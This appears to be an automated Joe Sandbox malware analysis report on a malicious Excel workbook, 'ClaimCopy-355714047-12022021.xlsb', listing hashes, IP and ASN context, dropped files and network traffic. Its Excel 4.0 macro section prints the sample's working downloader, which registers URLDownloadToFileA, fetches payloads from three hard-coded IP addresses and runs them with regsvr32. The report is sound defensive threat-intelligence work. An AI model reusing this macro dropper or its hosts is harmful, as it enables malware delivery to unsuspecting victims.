                                                                                                                                            		unknownRussian Federation
                                                                                                                                            		208861RACKTECHRUfalse
                                                                                                                                            158.69.133.78
                                                                                                                                            		unknownCanada
                                                                                                                                            		16276OVHFRfalse
                                                                                                                                            185.82.126.78
                                                                                                                                            		unknownLatvia
                                                                                                                                            		52173MAKONIXLVfalse

                                                                                                                                            General Information

                                                                                                                                            Joe Sandbox Version:34.0.0 Boulder Opal
                                                                                                                                            Analysis ID:532933
                                                                                                                                            Start date:02.12.2021
                                                                                                                                            Start time:20:58:09
                                                                                                                                            Joe Sandbox Product:CloudBasic
                                                                                                                                            Overall analysis duration:0h 7m 54s
                                                                                                                                            Hypervisor based Inspection enabled:false
                                                                                                                                            Report type:light
                                                                                                                                            Sample file name:ClaimCopy-355714047-12022021.xlsb
                                                                                                                                            Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                            Run name:Potential for more IOCs and behavior
                                                                                                                                            Number of analysed new started processes analysed:32
                                                                                                                                            Number of new started drivers analysed:0
                                                                                                                                            Number of existing processes analysed:0
                                                                                                                                            Number of existing drivers analysed:0
                                                                                                                                            Number of injected processes analysed:0
                                                                                                                                            Technologies:
                                                                                                                                            • HCA enabled
                                                                                                                                            • EGA enabled
                                                                                                                                            • HDC enabled
                                                                                                                                            • AMSI enabled
                                                                                                                                            Analysis Mode:default
                                                                                                                                            Analysis stop reason:Timeout
                                                                                                                                            Detection:MAL
                                                                                                                                            Classification:mal76.expl.evad.winXLSB@13/6@0/3
                                                                                                                                            EGA Information:Failed
                                                                                                                                            HDC Information:Failed
                                                                                                                                            HCA Information:
                                                                                                                                            • Successful, ratio: 100%
                                                                                                                                            • Number of executed functions: 0
                                                                                                                                            • Number of non-executed functions: 0
                                                                                                                                            Cookbook Comments:
                                                                                                                                            • Adjust boot time
                                                                                                                                            • Enable AMSI
                                                                                                                                            • Found application associated with file extension: .xlsb
                                                                                                                                            • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                            • Attach to Office via COM
                                                                                                                                            • Scroll down
                                                                                                                                            • Close Viewer
                                                                                                                                            Warnings:
                                                                                                                                            Show All
                                                                                                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                                                                                                            • Excluded IPs from analysis (whitelisted): 52.109.88.177, 52.109.76.36
                                                                                                                                            • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, prod-w.nexus.live.com.akadns.net, config.officeapps.live.com, prod.configsvc1.live.com.akadns.net, ctldl.windowsupdate.com, nexus.officeapps.live.com, displaycatalog.mp.microsoft.com, officeclient.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com, europe.configsvc1.live.com.akadns.net
                                                                                                                                            • Execution Graph export aborted for target EXCEL.EXE, PID 5140 because there are no executed function
                                                                                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                                                                                            • Report size exceeded maximum capacity and may have missing behavior information.

                                                                                                                                            Simulations

                                                                                                                                            Behavior and APIs

                                                                                                                                            No simulations

                                                                                                                                            Joe Sandbox View / Context

                                                                                                                                            IPs

                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                            45.142.211.62ClaimCopy-1848214335-12022021.xlsbGet hashmaliciousBrowse
                                                                                                                                            • 45.142.211.62/337591964609.dat2
                                                                                                                                            ClaimCopy-1848214335-12022021.xlsbGet hashmaliciousBrowse
                                                                                                                                            • 45.142.211.62/710203175032.dat2
                                                                                                                                            ClaimCopy-539408676-12022021.xlsbGet hashmaliciousBrowse
                                                                                                                                            • 45.142.211.62/480628690611.dat2
                                                                                                                                            ClaimCopy-539408676-12022021.xlsbGet hashmaliciousBrowse
                                                                                                                                            • 45.142.211.62/939602286691.dat2
                                                                                                                                            ClaimCopy-539408676-12022021.xlsbGet hashmaliciousBrowse
                                                                                                                                            • 45.142.211.62/533792932717.dat2
                                                                                                                                            158.69.133.78ClaimCopy-355714047-12022021.xlsbGet hashmaliciousBrowse
                                                                                                                                            • 158.69.133.78/574766024224.dat2
                                                                                                                                            ClaimCopy-1848214335-12022021.xlsbGet hashmaliciousBrowse
                                                                                                                                            • 158.69.133.78/337591964609.dat2
                                                                                                                                            ClaimCopy-1848214335-12022021.xlsbGet hashmaliciousBrowse
                                                                                                                                            • 158.69.133.78/710203175032.dat2
                                                                                                                                            ClaimCopy-539408676-12022021.xlsbGet hashmaliciousBrowse
                                                                                                                                            • 158.69.133.78/480628690611.dat2
                                                                                                                                            ClaimCopy-539408676-12022021.xlsbGet hashmaliciousBrowse
                                                                                                                                            • 158.69.133.78/939602286691.dat2
                                                                                                                                            ClaimCopy-539408676-12022021.xlsbGet hashmaliciousBrowse
                                                                                                                                            • 158.69.133.78/533792932717.dat2
                                                                                                                                            185.82.126.78ClaimCopy-1848214335-12022021.xlsbGet hashmaliciousBrowse
                                                                                                                                            • 185.82.126.78/337591964609.dat2
                                                                                                                                            ClaimCopy-1848214335-12022021.xlsbGet hashmaliciousBrowse
                                                                                                                                            • 185.82.126.78/710203175032.dat2
                                                                                                                                            ClaimCopy-539408676-12022021.xlsbGet hashmaliciousBrowse
                                                                                                                                            • 185.82.126.78/480628690611.dat2
                                                                                                                                            ClaimCopy-539408676-12022021.xlsbGet hashmaliciousBrowse
                                                                                                                                            • 185.82.126.78/939602286691.dat2
                                                                                                                                            ClaimCopy-539408676-12022021.xlsbGet hashmaliciousBrowse
                                                                                                                                            • 185.82.126.78/533792932717.dat2

                                                                                                                                            Domains

                                                                                                                                            No context

                                                                                                                                            ASN

                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                            RACKTECHRUClaimCopy-355714047-12022021.xlsbGet hashmaliciousBrowse
                                                                                                                                            • 45.142.211.62
                                                                                                                                            ClaimCopy-1848214335-12022021.xlsbGet hashmaliciousBrowse
                                                                                                                                            • 45.142.211.62
                                                                                                                                            ClaimCopy-1848214335-12022021.xlsbGet hashmaliciousBrowse
                                                                                                                                            • 45.142.211.62
                                                                                                                                            ClaimCopy-539408676-12022021.xlsbGet hashmaliciousBrowse
                                                                                                                                            • 45.142.211.62
                                                                                                                                            ClaimCopy-539408676-12022021.xlsbGet hashmaliciousBrowse
                                                                                                                                            • 45.142.211.62
                                                                                                                                            ClaimCopy-539408676-12022021.xlsbGet hashmaliciousBrowse
                                                                                                                                            • 45.142.211.62
                                                                                                                                            CNSL-1741057625-Nov-22.xlsbGet hashmaliciousBrowse
                                                                                                                                            • 45.142.211.22
                                                                                                                                            CNSL-1741057625-Nov-22.xlsbGet hashmaliciousBrowse
                                                                                                                                            • 45.142.211.22
                                                                                                                                            8Jem3WHfr1.exeGet hashmaliciousBrowse
                                                                                                                                            • 193.38.235.234
                                                                                                                                            Static.exeGet hashmaliciousBrowse
                                                                                                                                            • 193.38.235.15
                                                                                                                                            aFxrnP3GU4Get hashmaliciousBrowse
                                                                                                                                            • 91.223.144.104
                                                                                                                                            mirai.armGet hashmaliciousBrowse
                                                                                                                                            • 95.181.163.105
                                                                                                                                            W1Mjz5NWWlGet hashmaliciousBrowse
                                                                                                                                            • 91.223.144.109
                                                                                                                                            qQKiWkenaq.exeGet hashmaliciousBrowse
                                                                                                                                            • 185.156.177.75
                                                                                                                                            VKtCIrdZz3.exeGet hashmaliciousBrowse
                                                                                                                                            • 185.156.177.75
                                                                                                                                            9lzoAGDhiF.exeGet hashmaliciousBrowse
                                                                                                                                            • 185.156.177.75
                                                                                                                                            jgkOeJEe1J.exeGet hashmaliciousBrowse
                                                                                                                                            • 185.156.177.75
                                                                                                                                            2xwePIrz6Y.exeGet hashmaliciousBrowse
                                                                                                                                            • 185.156.177.75
                                                                                                                                            I6l48v5NQDGet hashmaliciousBrowse
                                                                                                                                            • 193.38.234.19
                                                                                                                                            Nzt41q6zTL.exeGet hashmaliciousBrowse
                                                                                                                                            • 95.181.163.15
                                                                                                                                            MAKONIXLVClaimCopy-355714047-12022021.xlsbGet hashmaliciousBrowse
                                                                                                                                            • 185.82.126.78
                                                                                                                                            ClaimCopy-1848214335-12022021.xlsbGet hashmaliciousBrowse
                                                                                                                                            • 185.82.126.78
                                                                                                                                            ClaimCopy-1848214335-12022021.xlsbGet hashmaliciousBrowse
                                                                                                                                            • 185.82.126.78
                                                                                                                                            ClaimCopy-539408676-12022021.xlsbGet hashmaliciousBrowse
                                                                                                                                            • 185.82.126.78
                                                                                                                                            ClaimCopy-539408676-12022021.xlsbGet hashmaliciousBrowse
                                                                                                                                            • 185.82.126.78
                                                                                                                                            ClaimCopy-539408676-12022021.xlsbGet hashmaliciousBrowse
                                                                                                                                            • 185.82.126.78
                                                                                                                                            REJC-688189380-Nov-25.xlsbGet hashmaliciousBrowse
                                                                                                                                            • 185.82.127.80
                                                                                                                                            REJC-688189380-Nov-25.xlsbGet hashmaliciousBrowse
                                                                                                                                            • 185.82.127.80
                                                                                                                                            51160ae1edfcf45c5e3e6e1bedc4a5bdcfc27d5e23cb0.exeGet hashmaliciousBrowse
                                                                                                                                            • 185.82.126.98
                                                                                                                                            New Order Contract No 44322465.exeGet hashmaliciousBrowse
                                                                                                                                            • 185.82.126.89
                                                                                                                                            ttIfPeM79u.exeGet hashmaliciousBrowse
                                                                                                                                            • 185.82.127.214
                                                                                                                                            FANDER_MOD V3.03.exeGet hashmaliciousBrowse
                                                                                                                                            • 185.82.126.114
                                                                                                                                            FANDER_MOD V3.03.exeGet hashmaliciousBrowse
                                                                                                                                            • 185.82.126.114
                                                                                                                                            1D40F773FC7559E478572A30D1CDB0436E1FD792.exeGet hashmaliciousBrowse
                                                                                                                                            • 185.82.126.114
                                                                                                                                            H-Fortnite.exeGet hashmaliciousBrowse
                                                                                                                                            • 185.82.126.114
                                                                                                                                            FOXHACK.exeGet hashmaliciousBrowse
                                                                                                                                            • 185.82.126.114
                                                                                                                                            AlingWare.exeGet hashmaliciousBrowse
                                                                                                                                            • 185.82.126.114
                                                                                                                                            MinecraftHackV1.8.exeGet hashmaliciousBrowse
                                                                                                                                            • 185.82.126.114
                                                                                                                                            bbXJN4YEIq.exeGet hashmaliciousBrowse
                                                                                                                                            • 185.82.126.114
                                                                                                                                            WjmYak325l.exeGet hashmaliciousBrowse
                                                                                                                                            • 185.82.126.100
                                                                                                                                            OVHFRClaimCopy-355714047-12022021.xlsbGet hashmaliciousBrowse
                                                                                                                                            • 158.69.133.78
                                                                                                                                            7009.xlsxGet hashmaliciousBrowse
                                                                                                                                            • 87.98.234.164
                                                                                                                                            TNT Documents.exeGet hashmaliciousBrowse
                                                                                                                                            • 51.255.30.106
                                                                                                                                            ClaimCopy-1848214335-12022021.xlsbGet hashmaliciousBrowse
                                                                                                                                            • 158.69.133.78
                                                                                                                                            ClaimCopy-1848214335-12022021.xlsbGet hashmaliciousBrowse
                                                                                                                                            • 158.69.133.78
                                                                                                                                            ClaimCopy-539408676-12022021.xlsbGet hashmaliciousBrowse
                                                                                                                                            • 158.69.133.78
                                                                                                                                            ClaimCopy-539408676-12022021.xlsbGet hashmaliciousBrowse
                                                                                                                                            • 158.69.133.78
                                                                                                                                            ClaimCopy-539408676-12022021.xlsbGet hashmaliciousBrowse
                                                                                                                                            • 158.69.133.78
                                                                                                                                            reg.exeGet hashmaliciousBrowse
                                                                                                                                            • 213.186.33.5
                                                                                                                                            REQUEST FOR SPECIFICATION.exeGet hashmaliciousBrowse
                                                                                                                                            • 213.251.158.218
                                                                                                                                            ETgVKIYRW5.dllGet hashmaliciousBrowse
                                                                                                                                            • 149.56.106.83
                                                                                                                                            cMVyW1SDZz.dllGet hashmaliciousBrowse
                                                                                                                                            • 149.56.106.83
                                                                                                                                            ETgVKIYRW5.dllGet hashmaliciousBrowse
                                                                                                                                            • 149.56.106.83
                                                                                                                                            cMVyW1SDZz.dllGet hashmaliciousBrowse
                                                                                                                                            • 149.56.106.83
                                                                                                                                            2iJBYBel22.dllGet hashmaliciousBrowse
                                                                                                                                            • 149.56.106.83
                                                                                                                                            2iJBYBel22.dllGet hashmaliciousBrowse
                                                                                                                                            • 149.56.106.83
                                                                                                                                            Tender SN980018277 & SN9901827 Signed Copy.exeGet hashmaliciousBrowse
                                                                                                                                            • 51.161.104.181
                                                                                                                                            Invoice.exeGet hashmaliciousBrowse
                                                                                                                                            • 54.38.220.85
                                                                                                                                            AegEywmjUJ.exeGet hashmaliciousBrowse
                                                                                                                                            • 51.79.99.124
                                                                                                                                            P.O SPECIFICATION.xlsxGet hashmaliciousBrowse
                                                                                                                                            • 51.79.99.124

                                                                                                                                            JA3 Fingerprints

                                                                                                                                            No context

                                                                                                                                            Dropped Files

                                                                                                                                            No context

                                                                                                                                            Created / dropped Files

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\1C879995-8362-47D0-A5BB-F2EF376F1B92
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                            File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):140402
                                                                                                                                            Entropy (8bit):5.356837185034186
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:1536:NcQIfgxrBdA3gBwtnQ9DQW+zUk4Ff7nXmvid1XiE6LWmE9:XuQ9DQW+ziXfH
                                                                                                                                            MD5:F6274765DA606FDEF0078893DB63323A
                                                                                                                                            SHA1:5C236960557C236002232615189B2985479B5F87
                                                                                                                                            SHA-256:32A22CB3E4D579CD7B1FAA6DE03928CFA0829CC930EA9D88E13FC7F1E47B1F0F
                                                                                                                                            SHA-512:210AE0354205E6F5AE3B0562216194F52F1496C508E3B689F5DFB46DA87EE80FCB6C1C91F963D73A73415AA4847EEE8EA4AA5D87513939081703CDD7C0AEEBFB
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-12-02T19:59:01">.. Build: 16.0.14729.30527-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\68B0554C.jpg
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 1098x988, frames 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):85681
                                                                                                                                            Entropy (8bit):7.915850776614707
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:1536:wB5SOqcuTUdehXyvl0f4CZpUcab2GFVbgPuDF7exsylBviKsUw:Pc6EehCfCZpUHKGXbBKsiit
                                                                                                                                            MD5:4F100E2CEFED046B44EC799015B454EF
                                                                                                                                            SHA1:5149E5D1B5212C77B3548914E9B47D67B4BEA574
                                                                                                                                            SHA-256:D30B441AB0E88A1487F29A80D63E2A4865A3F5DF7854FB8359B354397F807E2C
                                                                                                                                            SHA-512:153581151434815CC17E88D587FF6A6AF8F7154B4A05146453A9814F662C68D79F1063BDD9F789A1DB2F5818D199EF600703F8BC35785B0705332EC231F35A14
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:moderate, very likely benign file
                                                                                                                                            Preview: ......JFIF...........................................'......'#*" "*#>1++1>H<9<HWNNWmhm................................'......'#*" "*#>1++1>H<9<HWNNWmhm...........J..".................................................".............................................................q.[..+...*...K.... ..............?.......g....6..)....=~....................w5...........7_.-.......k.../...;.........!.z%o..w!....,.............?...Gs?.].......C..P~i.._.=..`....{...w....."..-........:..d.....................;z7)...~g........C....v..\..O.....0...v........v... ............A...;.~Y.}.....MsC.~..5..?.;.........V7....G...b..~...........@................O.}...o4.s_...z78.1.yl...X~.u..~..S....J..V~S..x.u~.. ..............@....u..m....rGrf.P.._+Z..?AW..~..u.G....................o&..................................................................9.0...H.Zx...M.y.[kW..o......;.....z......}v.m..[R.i....R..m....+.J............r6.P....|s..].vO._.}..K.]-V.U=9}........W......3.....G.t}Y
                                                                                                                                            C:\Users\user\Desktop\0E340000
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                            File Type:Microsoft Excel 2007+
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):99472
                                                                                                                                            Entropy (8bit):7.830475726763584
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:1536:IhyB5SOqcuTUdehXyvl0f4CZpUcab2GFVbgPuDF7exsylBviKsU/B:Inc6EehCfCZpUHKGXbBKsii6
                                                                                                                                            MD5:E9F891518AF09FB0781A39B41EB33381
                                                                                                                                            SHA1:8E0D92F2700BF44B6BD6411FB89FF94565CDF0EE
                                                                                                                                            SHA-256:74CD0B58137FBAA2AB29D851602E0A86AB17372F5CB81EE753C9798C24F48B15
                                                                                                                                            SHA-512:44817AEFB8FFD5D6E54853B9BF0EA118AA8B4503A0BB46E22E9C95FE389FC20AE0354E7C1621A39C1FFE56474B4511F5EE3FD86678BE2B1547B1711103BC6B2E
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            Preview: PK..........!.V..............[Content_Types].xml ...(....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................U.n.0.}G..".....BM..C......^|.x8.....v...&kTx.......{..e....jg+...V.........{V`.VI.,Tl...._.n... ...1..B`.B'.;...l\.d.ah...O..X,....6.1q....l..UO.w+....w.T..F.2.B.U........ r.........M.."...0.......N..l..7dsD!..w0..........&I}...ZAq-C.&;.F.Fd.9...F._.)...h....r..../VA?K.p...O...../.s....?.d.....S.v...K>].c...6.].r.CG...4O.4R....p...b.....M.t..c..8!...........D/d..Q.p.1f....n..0....}..>...d0S.....X...
                                                                                                                                            C:\Users\user\Desktop\0E340000:Zone.Identifier
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                            Category:modified
                                                                                                                                            Size (bytes):26
                                                                                                                                            Entropy (8bit):3.95006375643621
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:ggPYV:rPYV
                                                                                                                                            MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:high, very likely benign file
                                                                                                                                            Preview: [ZoneTransfer]....ZoneId=0
                                                                                                                                            C:\Users\user\Desktop\ClaimCopy-355714047-12022021.xlsb (copy)
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                            File Type:Microsoft Excel 2007+
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):99472
                                                                                                                                            Entropy (8bit):7.830475726763584
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:1536:IhyB5SOqcuTUdehXyvl0f4CZpUcab2GFVbgPuDF7exsylBviKsU/B:Inc6EehCfCZpUHKGXbBKsii6
                                                                                                                                            MD5:E9F891518AF09FB0781A39B41EB33381
                                                                                                                                            SHA1:8E0D92F2700BF44B6BD6411FB89FF94565CDF0EE
                                                                                                                                            SHA-256:74CD0B58137FBAA2AB29D851602E0A86AB17372F5CB81EE753C9798C24F48B15
                                                                                                                                            SHA-512:44817AEFB8FFD5D6E54853B9BF0EA118AA8B4503A0BB46E22E9C95FE389FC20AE0354E7C1621A39C1FFE56474B4511F5EE3FD86678BE2B1547B1711103BC6B2E
                                                                                                                                            Malicious:true
                                                                                                                                            Preview: PK..........!.V..............[Content_Types].xml ...(....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................U.n.0.}G..".....BM..C......^|.x8.....v...&kTx.......{..e....jg+...V.........{V`.VI.,Tl...._.n... ...1..B`.B'.;...l\.d.ah...O..X,....6.1q....l..UO.w+....w.T..F.2.B.U........ r.........M.."...0.......N..l..7dsD!..w0..........&I}...ZAq-C.&;.F.Fd.9...F._.)...h....r..../VA?K.p...O...../.s....?.d.....S.v...K>].c...6.].r.CG...4O.4R....p...b.....M.t..c..8!...........D/d..Q.p.1f....n..0....}..>...d0S.....X...
                                                                                                                                            C:\Users\user\Desktop\~$ClaimCopy-355714047-12022021.xlsb
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):165
                                                                                                                                            Entropy (8bit):1.6081032063576088
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:RFXI6dtt:RJ1
                                                                                                                                            MD5:7AB76C81182111AC93ACF915CA8331D5
                                                                                                                                            SHA1:68B94B5D4C83A6FB415C8026AF61F3F8745E2559
                                                                                                                                            SHA-256:6A499C020C6F82C54CD991CA52F84558C518CBD310B10623D847D878983A40EF
                                                                                                                                            SHA-512:A09AB74DE8A70886C22FB628BDB6A2D773D31402D4E721F9EE2F8CCEE23A569342FEECF1B85C1A25183DD370D1DFFFF75317F628F9B3AA363BBB60694F5362C7
                                                                                                                                            Malicious:true
                                                                                                                                            Preview: .pratesh ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                                                                                                                                            Static File Info

                                                                                                                                            General

                                                                                                                                            File type:Microsoft Excel 2007+
                                                                                                                                            Entropy (8bit):7.831014482033694
                                                                                                                                            TrID:
                                                                                                                                            • Microsoft Excel Office Binary workbook document (40504/1) 83.51%
                                                                                                                                            • ZIP compressed archive (8000/1) 16.49%
                                                                                                                                            File name:ClaimCopy-355714047-12022021.xlsb
                                                                                                                                            File size:99677
                                                                                                                                            MD5:1f51fa867f5bbce3ab1cc40bf75f7f9b
                                                                                                                                            SHA1:2c690539b53f4db35af92e2b88880c3d76fcd323
                                                                                                                                            SHA256:f3dc3443c7ba185b1c8eff63807384e9bb6734fa0774d9964213dd9baf3fb3c3
                                                                                                                                            SHA512:cf98c415cee36aa57815e5f0b2a0708ca7035ec34c46848cc47fb07859d013f5f9c5651d32478a2fe4ef62730cf450570d28ae18ec884a8a0612e739a37e8f84
                                                                                                                                            SSDEEP:1536:rMB5SOqcuTUdehXyvl0f4CZpUcab2GFVbgPuDF7exsylBviKsUfp:/c6EehCfCZpUHKGXbBKsiiOp
                                                                                                                                            File Content Preview:PK..........!...~.............[Content_Types].xml ...(.........................................................................................................................................................................................................

                                                                                                                                            File Icon

                                                                                                                                            Icon Hash:74f0d0d2c6d6d0f4

                                                                                                                                            Static OLE Info

                                                                                                                                            General

                                                                                                                                            Document Type:OpenXML
                                                                                                                                            Number of OLE Files:1

                                                                                                                                            OLE File "ClaimCopy-355714047-12022021.xlsb"

                                                                                                                                            Indicators

                                                                                                                                            Has Summary Info:
                                                                                                                                            Application Name:
                                                                                                                                            Encrypted Document:
                                                                                                                                            Contains Word Document Stream:
                                                                                                                                            Contains Workbook/Book Stream:
                                                                                                                                            Contains PowerPoint Document Stream:
                                                                                                                                            Contains Visio Document Stream:
                                                                                                                                            Contains ObjectPool Stream:
                                                                                                                                            Flash Objects Count:
                                                                                                                                            Contains VBA Macros:

                                                                                                                                            Macro 4.0 Code

                                                                                                                                            8,6,=Drozd(0,"http://"&Tiposa!E21&Tiposa!G22&Tiposa!G23,"C:\ProgramData\Volet1.ocx",0,0)
9,6,=Drozd(0,"http://"&Tiposa!E22&Tiposa!G22&Tiposa!G23,"C:\ProgramData\Volet2.ocx",0,0)
10,6,=Drozd(0,"http://"&Tiposa!E23&Tiposa!G22&Tiposa!G23,"C:\ProgramData\Volet3.ocx",0,0)
11,6,=Drozd(0,"http://"&Tiposa!E24&Tiposa!G22&Tiposa!G24,"C:\ProgramData\Volet4.ocx",0,0)
12,6,=Drozd(0,"http://"&Tiposa!E25&Tiposa!G22&Tiposa!G24,"C:\ProgramData\Volet5.ocx",0,0)
13,6,=Drozd(0,"http://"&Tiposa!E26&Tiposa!G22&Tiposa!G24,"C:\ProgramData\Volet6.ocx",0,0)
15,6,=EXEC("regsvr32  C:\ProgramData\Volet1.ocx")
16,6,=EXEC("regsvr32 C:\ProgramData\Volet2.ocx")
17,6,=EXEC("regsvr32 C:\ProgramData\Volet3.ocx")
18,6,=EXEC("regsvr32 -e -n -i:&Tiposa!G22&  C:\ProgramData\Volet4.ocx")
19,6,=EXEC("regsvr32 -e -n -i:&Tiposa!G22&  C:\ProgramData\Volet5.ocx")
20,6,=EXEC("regsvr32 -e -n -i:&Tiposa!G22&  C:\ProgramData\Volet6.ocx")
23,6,=HALT()

                                                                                                                                            1,1,523
4,9,34543
4,12,43
5,2,ui
5,9,7
5,14,43
6,14,36
7,0,ug
7,1,&#208;&#181;&#209;&#131;5&#209;&#134;&#209;&#131;5
8,9,34
8,10,5
9,1,y
9,16,346
10,7,rt
10,8,345
10,9,u
11,2,23
11,7,ertertyh57s5ry
11,11,5
11,12,35
12,1,65
12,2,7
12,9,r67
13,2,mfy
13,7,65
13,10,7
13,14,34
13,15,543
14,0,uh
14,1,y
15,0,7
15,7,65
15,10,ae46
16,2,d7
16,3,uRl
17,3,=&#34;Mon&#34;
17,9,dt
17,10,6
17,12,u
17,13,5
18,3,=&#34;URLDownloadTo&#34;
18,8,yu
18,10,sb
18,14,5
19,3,=&#34;JJCCBB&#34;
19,7,f
20,0,7
20,1,7
20,4,185.82.126.78/
20,7,523
20,8,u
21,0,md
21,4,158.69.133.78/
21,6,=RANDBETWEEN(142536473,988879789754)
21,9,s
21,11,m
22,1,7
22,4,45.142.211.62/
22,6,=&#34;.dat&#34;
22,8,6
23,4,45.142.211.62/
23,6,=&#34;.dat2&#34;
23,11,4
23,15,46
24,4,185.82.126.78/
24,6,=REGISTER(D17&#38;D18,D19&#38;&#34;FileA&#34;,D20,&#34;Drozd&#34;,,1,9)
24,8,23
24,14,6
24,15,43
25,1,567
25,4,158.69.133.78/
25,10,23
25,13,5
28,2,756
37,6,=GOTO(Tiposa1!G8)

                                                                                                                                            Network Behavior

                                                                                                                                            Snort IDS Alerts

                                                                                                                                            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                            12/02/21-20:49:37.323864TCP1201ATTACK-RESPONSES 403 Forbidden8049167158.69.133.78192.168.2.22
                                                                                                                                            12/02/21-20:51:44.215042TCP1201ATTACK-RESPONSES 403 Forbidden8049175158.69.133.78192.168.2.22

                                                                                                                                            Network Port Distribution

                                                                                                                                            TCP Packets

                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                            Dec 2, 2021 20:59:06.364130974 CET4974680192.168.2.3185.82.126.78
                                                                                                                                            Dec 2, 2021 20:59:09.362092018 CET4974680192.168.2.3185.82.126.78
                                                                                                                                            Dec 2, 2021 20:59:15.362546921 CET4974680192.168.2.3185.82.126.78
                                                                                                                                            Dec 2, 2021 20:59:27.402400970 CET4974980192.168.2.3158.69.133.78
                                                                                                                                            Dec 2, 2021 20:59:27.511481047 CET8049749158.69.133.78192.168.2.3
                                                                                                                                            Dec 2, 2021 20:59:27.511593103 CET4974980192.168.2.3158.69.133.78
                                                                                                                                            Dec 2, 2021 20:59:27.512147903 CET4974980192.168.2.3158.69.133.78
                                                                                                                                            Dec 2, 2021 20:59:27.621121883 CET8049749158.69.133.78192.168.2.3
                                                                                                                                            Dec 2, 2021 20:59:28.168723106 CET8049749158.69.133.78192.168.2.3
                                                                                                                                            Dec 2, 2021 20:59:28.168791056 CET4974980192.168.2.3158.69.133.78
                                                                                                                                            Dec 2, 2021 20:59:28.174340963 CET4975080192.168.2.345.142.211.62
                                                                                                                                            Dec 2, 2021 20:59:31.176393986 CET4975080192.168.2.345.142.211.62
                                                                                                                                            Dec 2, 2021 20:59:37.176918030 CET4975080192.168.2.345.142.211.62
                                                                                                                                            Dec 2, 2021 20:59:49.426594019 CET4976780192.168.2.345.142.211.62
                                                                                                                                            Dec 2, 2021 20:59:52.412763119 CET4976780192.168.2.345.142.211.62
                                                                                                                                            Dec 2, 2021 20:59:58.428767920 CET4976780192.168.2.345.142.211.62
                                                                                                                                            Dec 2, 2021 21:00:10.445702076 CET4980780192.168.2.3185.82.126.78
                                                                                                                                            Dec 2, 2021 21:00:13.461406946 CET4980780192.168.2.3185.82.126.78
